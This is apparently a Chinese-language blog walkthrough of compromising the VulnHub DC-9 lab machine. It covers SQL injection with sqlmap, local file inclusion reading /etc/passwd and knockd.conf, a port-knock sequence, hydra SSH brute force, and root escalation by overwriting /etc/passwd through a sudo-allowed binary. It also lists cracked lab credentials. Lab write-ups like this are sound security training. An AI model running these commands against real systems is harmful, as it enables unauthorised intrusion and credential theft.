一、介绍
运行环境:Virtualbox
攻击机:kali(10.0.2.15)
靶机:DC9(10.0.2.62)
目标:获取靶机root权限和flag
靶机下载地址:https://www.vulnhub.com/entry/dc-9,412/
二、信息收集
使用nmap主机发现靶机ip:10.0.2.62
使用nmap端口扫描发现靶机开放端口:22、80
nmap -A 10.0.2.62 -p 1-65535
打开网站发现是一个员工数据网站
查看该网站各个功能点,发现一个搜索信息功能 ,测试是否存在sql注入漏洞
发现输入Mary'回显异常,输入Mary'#回显正常,存在sql注入
三、漏洞利用
使用burpsuite抓搜索信息的数据包,将数据包保存在post.txt文件,直接使用sqlmap工具进行测试,发现两个用户表
sqlmap -r post.txt -D Staff -T Users --dump
sqlmap -r post.txt -D users -T UserDetails --dump
网站应该是使用admin用户登录,admin用户名密码:admin:856f5de590ef37314e7c3bdf6f8a66dc
使用在线网站解密得到:admin:transorbital1
登录网站,发现在底下存在信息File does not exist,可能存在文件包含漏洞
使用burpsuite爆破LFI,发现file参数
根据/etc/passwd文件内容,发现靶机存在用户如下:
root:x:0:0:root:/root:/bin/bash
marym:x:1001:1001:Mary Moe:/home/marym:/bin/bash
julied:x:1002:1002:Julie Dooley:/home/julied:/bin/bash
fredf:x:1003:1003:Fred Flintstone:/home/fredf:/bin/bash
barneyr:x:1004:1004:Barney Rubble:/home/barneyr:/bin/bash
tomc:x:1005:1005:Tom Cat:/home/tomc:/bin/bash
jerrym:x:1006:1006:Jerry Mouse:/home/jerrym:/bin/bash
wilmaf:x:1007:1007:Wilma Flintstone:/home/wilmaf:/bin/bash
bettyr:x:1008:1008:Betty Rubble:/home/bettyr:/bin/bash
chandlerb:x:1009:1009:Chandler Bing:/home/chandlerb:/bin/bash
joeyt:x:1010:1010:Joey Tribbiani:/home/joeyt:/bin/bash
rachelg:x:1011:1011:Rachel Green:/home/rachelg:/bin/bash
rossg:x:1012:1012:Ross Geller:/home/rossg:/bin/bash
monicag:x:1013:1013:Monica Geller:/home/monicag:/bin/bash
phoebeb:x:1014:1014:Phoebe Buffay:/home/phoebeb:/bin/bash
scoots:x:1015:1015:Scooter McScoots:/home/scoots:/bin/bash
janitor:x:1016:1016:Donald Trump:/home/janitor:/bin/bash
janitor2:x:1017:1017:Scott Morrison:/home/janitor2:/bin/bash
根据之前nmap的扫描结果22端口被关闭了,怀疑是配置了knockd服务,我们可以尝试包含knockd的配置文件
端口敲门服务,即:knockd服务。该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,使系统开启需要访问的服务端口,才能对外访问。不使用时,再使用自定义的序列号来“关门”,将端口关闭,不对外监听。进一步提升了服务和系统的安全性。他的默认配置文件是:/etc/knockd.conf
使用knockd敲门,打开22端口
knock 10.0.2.62 7469 8475 9842
使用之前sqlmap跑出来的用户名密码登录ssh
发现只有chandlerb、joeyt和Ilovepeepee用户的用户名密码可以登录ssh
四、提权
查看这三个用户是否存在特权命令,或是否存在具有root权限的可利用的可执行文件,均未发现
翻一翻靶机各个文件夹,在janitor用户home/.secrets-for-putin目录下发现存在一个字典文件
使用hydra工具和新获得的字典文件对靶机ssh进行暴力破解,发现一组新的用户:fredf:B4-Tru3-001
hydra -L user1.txt -P passwd.txt ssh://10.0.2.62:22 -t 64
登录fredf用户
使用sudo -l查看一下具有sudo权限的程序,发现可以无密码以root权限运行/opt/devstuff/dist/test/test
发现test程序是一个python文件编译得到的,python文件源码如下:
该脚本将读取第一个参数文件内容,写入第二个参数文件中
可以使用test程序读取/etc/shadow的内容,然后使用john工具进行暴力破解,前提条件是你得有一个强大的字典
sudo /opt/devstuff/dist/test/test /etc/shadow shadow
cat shadow
我们可以通过向/etc/passwd中添加用户达到提权
利用Perl和crypt来使用salt值为我们的密码生成哈希值
perl -le 'print crypt("123456","addedsalt")'
创建一个password文件,将/etc/passwd文件内容复制进去,然后将test用户的信息加入 password 文件
test:adrla7IBSfTZQ:0:0:User_like_root:/root:/bin/bash
使用password文件将/etc/passwd文件覆盖
sudo /opt/devstuff/dist/test/test password /etc/passwd
用户名:test 密码: 123456 登录主机,登录成功后,是 root 权限
获取flag
参考链接:https://blog.youkuaiyun.com/qq_43462485/article/details/109456721
扫一扫
3232
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
